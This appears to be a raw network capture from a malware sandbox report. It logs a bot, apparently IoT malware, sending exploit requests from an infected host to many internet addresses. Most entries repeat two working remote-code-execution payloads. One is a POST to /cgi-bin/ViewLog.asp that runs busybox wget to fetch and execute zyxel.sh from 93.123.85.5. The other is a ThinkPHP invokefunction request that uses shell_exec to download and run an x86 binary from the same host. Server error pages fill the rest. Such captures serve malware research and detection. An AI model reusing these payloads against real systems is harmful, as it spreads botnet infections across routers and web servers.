                                                              Nov 13, 2023 22:19:27.419281006 CET10762INHTTP/1.1 400 Bad Request
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              521192.168.2.235290431.136.144.1448080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:27.101309061 CET10743OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:28.105962992 CET10872OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:30.089714050 CET11119OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:34.217184067 CET11618OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:42.152200937 CET12614OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:58.022059917 CET14623OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:29.761866093 CET18555OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              522192.168.2.234232662.141.71.2118080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:27.117923975 CET10745OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:27.462151051 CET10764INHTTP/1.1 405 Not Allowed
                                                              Server: Web server
                                                              Date: Mon, 13 Nov 2023 21:19:23 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Content-Length: 155
                                                              Connection: keep-alive
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>Web server</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              523192.168.2.234756295.129.177.1328080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:27.127806902 CET10746OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              524192.168.2.235783288.221.244.12680
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:27.128355980 CET10746OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:27.591640949 CET10769INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 257
                                                              Expires: Mon, 13 Nov 2023 21:19:27 GMT
                                                              Date: Mon, 13 Nov 2023 21:19:27 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 66 30 39 30 65 63 34 26 23 34 36 3b 31 36 39 39 39 31 30 33 36 37 26 23 34 36 3b 33 35 33 65 61 38 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;2f090ec4&#46;1699910367&#46;353ea86</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              525192.168.2.235410031.146.206.1388080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:27.175860882 CET10748OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:27.589862108 CET10768INHTTP/1.1 404 Not Found
                                                              Date: Tue, 14 Nov 2023 01:19:26 GMT
                                                              Server: web
                                                              X-Frame-Options: SAMEORIGIN
                                                              Cache-Control: no-cache
                                                              Content-Length: 166
                                                              Content-Type: text/html
                                                              Connection: keep-alive
                                                              Keep-Alive: timeout=60, max=99
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              526192.168.2.235343695.71.82.4980
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:27.393521070 CET10761OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              527192.168.2.234880662.29.96.2038080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:27.454006910 CET10763OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              528192.168.2.233813894.79.103.478080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:27.540947914 CET10766OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              529192.168.2.235159285.173.252.1338080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:27.546516895 CET10767OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              53192.168.2.234220488.203.154.23880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:17.004803896 CET2198OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:17.332019091 CET2209INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:18:17 GMT
                                                              Server: Apache
                                                              Content-Length: 226
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              530192.168.2.2356160112.125.197.23880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:29.085668087 CET10983OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:29.401066065 CET11004INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:18:17 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              531192.168.2.2339038112.240.57.22780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:29.133938074 CET10985OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:29.496237040 CET11008INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:19:29 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 161
                                                              Connection: close
                                                              Server: QTL_Cache/1.2.15
                                                              X-Qtl-Cpu-Cycle-From-Cs: 8680
                                                              X-Via: 1.1 as-cn-sdzbcu5-cache-0001 []
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 51 54 4c 5f 43 61 63 68 65 2f 31 2e 32 2e 31 35 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>QTL_Cache/1.2.15</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              532192.168.2.235550895.164.86.518080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:29.235968113 CET10987OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              533192.168.2.233653231.136.131.1258080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:29.259884119 CET10989OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:30.281682968 CET11124OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:32.297420025 CET11364OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:36.520878077 CET11894OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:44.711844921 CET12880OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
